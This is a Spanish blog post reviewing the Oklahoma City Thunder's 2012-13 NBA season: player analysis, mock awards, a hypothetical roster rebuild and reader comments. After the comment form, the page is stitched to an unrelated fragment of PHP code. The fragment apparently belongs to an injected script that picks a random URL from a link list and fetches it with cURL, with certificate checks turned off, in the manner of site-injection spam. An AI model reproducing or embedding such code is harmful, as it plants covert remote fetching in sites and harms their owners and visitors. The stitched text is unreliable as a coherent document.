Oklahoma City Thunder: Bien

29 de July de 2013 por Sancho88

“Sensaciones contradictorias”, titulaba Hynreck su análisis de pretemporada. Un análisis que contaba con la participación de James Harden en el equipo de la ciudad de los tornados. No obstante, Houston tiró de chequera y se llevó al “barbas” camino de Texas, dejando a Oklahoma sin aspiraciones al anillo. Sensaciones contradictorias que finalmente sí se cumplieron. Los Thunder compitieron de principio a fin en la regular, alcanzando las 60 victorias y dejando muy pocas dudas de su solidez como conjunto. Solo los Heat lograron más victorias que ellos (66) en toda la liga. Cosa bien distinta fueron los Playoffs.

La clave del título de conferencia fue, un año más, Kevin Durant. ‘Durantula’ asumió la falta de James Harden con naturalidad, como lo hacen los grandes campeones. Mejoró en prácticamente todo, demostrando también una mayor solidaridad con el balón en las manos. Sus porcentajes cumplen las reglas mesiánicas del tirador puro: 50-40-90, y en el resto de facetas Durant se ha ido ‘Lebronizando’ a lo largo de su carrera. 

Junto a él, Russell Westbrook también nos mostró su mejor versión, y juntos se consolidaron como 2 de los 10 mejores jugadores del mundo. No es de extrañar que la baja de Westbrook condicionara tanto el camino de los Thunder en Playoffs. Como tercera espada teóricamente esperábamos a Serge Ibaka y así fue al menos durante la temporada. Se mostró más agresivo en ataque, tomando más riesgos y lanzando mejor desde fuera, pero en cuanto llegaron los partidos importantes, se amedrentó y no pudo aportar lo que su equipo tanto necesitaba de él. Jugó infiltrado las series contra Memphis como él mismo declaró. Se le puede perdonar por ahí. Con el traspaso de James Harden, los Thunder confiaron a Kevin Martin la labor de sexto hombre, el jugador que debía desatascar desde el banquillo, pero la comparación era muy dura y Martin ya no estaba en el mejor momento de su carrera. Sin dejar de ser un escolta de gran clase que puede anotar más de 15 puntos por noche con suma facilidad, Martin ya no es el jugador que era en Sacramento o Houston. El invento no fue nada provechoso para Oklahoma, y mezcló noches de gran mérito con otras desastrosas (más lo segundo que lo primero).

Sin entrar a valorar demasiado (ya lo haremos en los premios), se echó en falta más valentía desde los despachos y desde el banquillo, sobre todo a partir de los Playoffs. Oklahoma partía como favorito indiscutible en el Oeste y la revancha contra Miami ya resonaba en la memoria de los aficionados. Pero el famoso robo de balón de Patrick Beverley en el segundo partido de la serie contra los Rockets  truncó el camino de los Thunder, que un año más se tuvieron que relamer los bigotes en relación al anillo de campeones. El menisco de Westbrook dijo basta en ese choque contra el base de los Rockets y automáticamente su equipo se autoimpuso una barrera mental competitiva que les alejó de las finales del Oeste.

Con lo que tenían les llegó para pasar de primera ronda pero Memphis les dio un señor repaso en semifinales, con un 4-1 en contra que bien pudo haber sido un 4-0 perfectamente si Conley y Gasol no hubieran perdido dos balones tontos en el primer partido de la serie. Fue la victoria de consolación en una temporada que recordaremos por ser el año 0 después de Harden, por la lesión de Westbrook y la impotencia de Kevin Durant, que triunfó como los dioses por tercera temporada consecutiva alzándose como máximo anotador de la liga, y cayó a la tierra como los héroes mundanos azotado por el rigor de conjunto de Marc y los suyos. La imagen de ‘KD’ cabizbajo resume perfectamente la temporada de Oklahoma. Mantuvieron las expectativas por todo lo alto mientras el equipo estuvo sano, pero se hundieron en el fracaso en cuanto sus piezas empezaron a temblar. Un hecho que habla perfectamente de la concepción limitada de un equipo que se encontró en drafts sucesivos con un elenco de estrellas de nivel mundial pero que a la hora de renovarlas no tuvo más dinero y se quedó sin fondo de armario. Renovarse o morir para próximos capítulos.

PREMIOS

MVP: Kevin Durant. Volvió a ser un año más el mejor jugador del equipo, pero en el imaginario colectivo aún está un paso por detrás del más grande de la canasta: Lebron James. Y eso que llegó incluso a cuestionar en algún momento de la temporada (antes de la racha de los 27 partidos invictos de los Heat) el liderato de James pero no pudo ser finalmente y Durant se quedó sin el premio al MVP de la temporada. Tendrá que tener paciencia. Algún día (más pronto que tarde), su 28-8-5 de temporada regular, y su 31-9-6 en Playoffs valdrán más que los números de LeBron. Seguramente el traspaso de poderes llegará con el primer anillo de Durant. Sería una sorpresa que no lo ganara jamás.

Rookie: Dejamos el hueco vacío. Y es una pena, pues Jeremy Lamb o Perry Jones podrían habernos deleitado en esta categoría en un equipo necesitado de anotación exterior y talento en la zona. Parece que Sam Presti se ha aburguesado y ya no recuerda el gran valor de evolucionar a jugadores jóvenes para llegar a grandes objetivos. No obstante, al final es Scott Brooks quien decide quién juega y quién no. Fue flagrante la falta de imaginación del entrenador en Playoffs. Murió con la vieja guardia, como Clemente. Tirón de orejas fuerte para estos dos ‘burricos’. A ver si aprenden algo de improvisación del manual de estilo de Popovich. Sin ella es imposible ganar un anillo. Los rookies han sido ellos por la forma infantil y miedosa en la que han manejado el equipo esta temporada.

Sorpresa: Reggie Jackson. Asumió en Playoffs la dirección del equipo con mucha solvencia. No firmó actuaciones estelares ni hizo olvidar a Westbrook, lo cual habría sido harto difícil, pero sí dio la cara en todo momento. Suficiente para llevarse el premio a la sorpresa esta temporada.

Decepción: Kendrick Perkins. No hay mucho que explicar. Un jugador que hizo un par de buenas temporadas en los Celtics. Pasaba por allí, hizo su trabajo defensivo, ganó un anillo y de repente se hinchó su caché hasta ser considerado como el mejor pívot defensivo de la liga. Oklahoma picó el anzuelo y se comió con tempura requemada uno de los peores contratos de la NBA. Un jugador que, por lo demás, deambula de un lado al otro de la cancha sin mucho qué hacer ni demostrar, esperando a que Collison le dé el relevo y la gente respire aliviada por no verle más en la pista. Una pena, porque muchos habrían apostado por él para armar un equipo campeón. A la postre Oklahoma se ha equivocado de lleno. Pero ya sabemos que a toro pasado, todos somos Manolete.

Esfuerzo en vano: Kevin Durant. Aprovechando que el alero de Washington ha firmado con la agencia de representación de Jay-Z Roc Nation, resumiremos su temporada con el título de uno de los álbumes del más grande en el mundo de la rima: Tupac Shakur. Y es que tras la salida de Harden, la lesión de Westbrook, la participación en semifinales de un mermado Ibaka y la escopeta de feria de Kevin Martin, Durant entonó aquello de ‘Me against the world’ contra los Grizzlies. Igual que Tupac, lo suyo acabó bastante mal. Posteriormente le cogió el gusanillo a lo del rap y firmó por Jay-Z, el nuevo Dr. Dre del rap mundial. A ver si la próxima aventura deportiva le vale un Grammy al bueno de ‘Durantula’. Esta fue de esfuerzo en vano en toda regla.

JUGANDO A GM

Oklahoma sigue teniendo a tiro conseguir su primer título en la NBA. Es una cuestión de mentalidad y de profundidad de banquillo. Si Durant, Westbrook e Ibaka están a tope, solo necesitan otros cuatro o cinco hombres que les arropen defensivamente y consigan asumir lanzamientos cuando ellos no estén en la pista. A priori, armar un equipo campeón con estos tres tipos resultaría muy fácil, pero el contrato de Kendrick Perkins lo echa todo a perder. Y la paradoja es que Oklahoma podría amnistiarle y usar los 8,5 millones de su contrato para reforzar la zona, pero Sam Presti se ha negado. La única lectura de todo esto es que les da miedo ir a por el anillo, porque de otra manera no se puede explicar. Pero como en este apartado soy yo el GM, en mi primer día de mandato Perkins iría a la calle con su amnistía bajo el brazo, y aún tendríamos 10 millones para llegar al impuesto de lujo.

Como por encima del Salary cap ya no es posible firmar agentes libres, habría que buscar un traspaso o utilizar las excepciones de nivel medio y de veteranos. Se me ocurre traspasar la segunda ronda del año que viene + Nick Collison a los Kings a cambio del expiring de Patrick Patterson, un jugador que no cuenta en la rotación de los Kings, que por otro lado necesitan un pívot suplente de Cousins, y Collison les vendría muy bien.

También traspasaría la primera ronda de 2014 más Perry Jones a los Cavaliers a cambio de Tristan Thompson, ya que los Cavaliers necesitan aleros como el comer y les sobran ala-pívots. Así, conseguiría una zona respetable con Serge Ibaka, Patrick Patterson y Tristan Thompson, tres jugadores de nivel medio-alto sobre los que podría crecer el rookie Steven Adams.

Además, con el fichaje de Derek Fisher, Westbrook vuelve a tener al maestro como suplente, más los minutos que pueda dar de relevo Reggie Jackson, que también puede jugar de 2. En la posición de escolta, Sefolosha es titular indiscutible. Aquí debería producirse el salto de calidad con Jeremy Lamb. El sophomore se ha lucido en las ligas de verano y debería jugar muchos minutos esta temporada y demostrar de lo que es capaz. Yo como GM tendría fe ciega en él. En la posición de alero venderíamos a Perry Jones a los Cavaliers como ya he comentado, porque para cumplir la función de suplente de Durant ya tenemos al también rookie Andre Roberson, un jugador poderoso en el rebote que recuerda mucho a Matt Barnes.

Por lo demás, no ejercería la Team Option sobre Hasheem Thabeet, pero sí lo haría sobre Daniel Orton y DeAndre Liggins, dos jugadores que han demostrado suficiente calidad para completar la rotación de un equipo como los Thunder. Así, el objetivo sería ir a por el campeonato, y me lanzaría a la piscina con este equipazo:

Bases: Russell Westbrook, Reggie Jackson, Derek Fisher
Escoltas: Thabo Sefolosha, Jeremy Lamb, DeAndre Liggins
Aleros: Kevin Durant, Andre Roberson
Ala-pívots: Serge Ibaka, Tristan Thompson, Patrick Patterson
Pívots: Steven Adams, Daniel Orton

Comenta

8 comentarios a esta entrada

  1. Denise dice:
    #1

    Perkins es un paquete, pero yo tampoco le amnistiaría a no ser que tenga las espaldas cubiertas habiendo adquirido a un center de calidad via traspaso.
    En mi opinión, con el rookie Adams y el inexperto Orton como únicos pivots que te quedarían, es imposible ganar un anillo.
    Mi sensación con los Thunder es que cada año que pasa, tienen peor equipo y sus porcentajes de ganar el anillo bajan. Ya analizaremos mejor en Octubre al equipo cuando las plantillas esten cerradas, pero a dia de hoy no los veo entre los 4 mejores del Oeste.

    Y si tuviera que quitarme a Perkins, aprovecharía para hacer un cambio drástico y meterlo en un paquete junto a Ibaka ó Westbrook.

      Citar

  2. Vader dice:
    #2

    El premio de mejor anotador este año no lo ganó KD, fue para Melo.

    La de talento que han dejado escapar los Thunder estos últimos años… Harden, Jeff Green y ahora Martin… casi nada. Al final les habría valido la pena el trade de Dwight Howard por Harden+Ibaka que se planteo hace 1 año y medio.

    Sea como sea para mi Durant y Weestbrook son la mejor pareja de la liga desde Jordan y Pippen.

    Saludos

      Citar

  3. Sancho88 dice:
    #3

    Razón tienes Vader, me he equivocado hermano. El problema es que lo tuve que hacer a toda hostia el análisis, me vi una noticia que ponia lo de durant, no me vi el titulo que ponia que había sido carmelo el máximo anotador, y tampoco me acordé que había sido él. Ya sabía yo que algún error tenía el resumen…

    Y como dice Denise, con esos pivots no iría el eqiupo ni a tomar por culo, pero como digo iba piyao de tiempo, y no se me ocurrió un pívot decente para fichar…

    Total, que pueden ser candidatos serios, pero cambiaría a Patterson por Oden y a tomar por culo

      Citar

  4. Vader dice:
    #4

    Nada, nada el análisis esta de puta madre Sancho88, lo que pasa es que mi Melo no me lo toquéis!! 😀

      Citar

  5. risax mj dice:
    #5

    Perkins de el baloncesto por favor. K asko de jugador chupa sangre fueraaaaaaaaaaaaa

      Citar

  6. Esteban dice:
    #6

    peor equipo cada año?

    mmmmm no comparto, si brooks es algo inteligente y hace jugar de uno/dos suplente a jackson y de 2/3 suplente a lamb TODO EL AÑO y dandoles confianza total durante todo el año, llegaran bastante maduros a los PO y entre ambos pueden darle la variedad ofensiva que carecen el thunder

    ambos chicos, pueden ser geniales saliendo de la banca este mismo año

      Citar

  7. Denise dice:
    #7

    Pues Ryan Gomes ficha por los Thunder para reforzar el banquillo.

      Citar

  8. Sancho88 dice:
    #8

    Txus no sé que pasa pero cuando me publicas los artículos aparece con mi nombre y días después aparecen con el tuyo. Sé que soy cansino con el tema, pero bueno…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>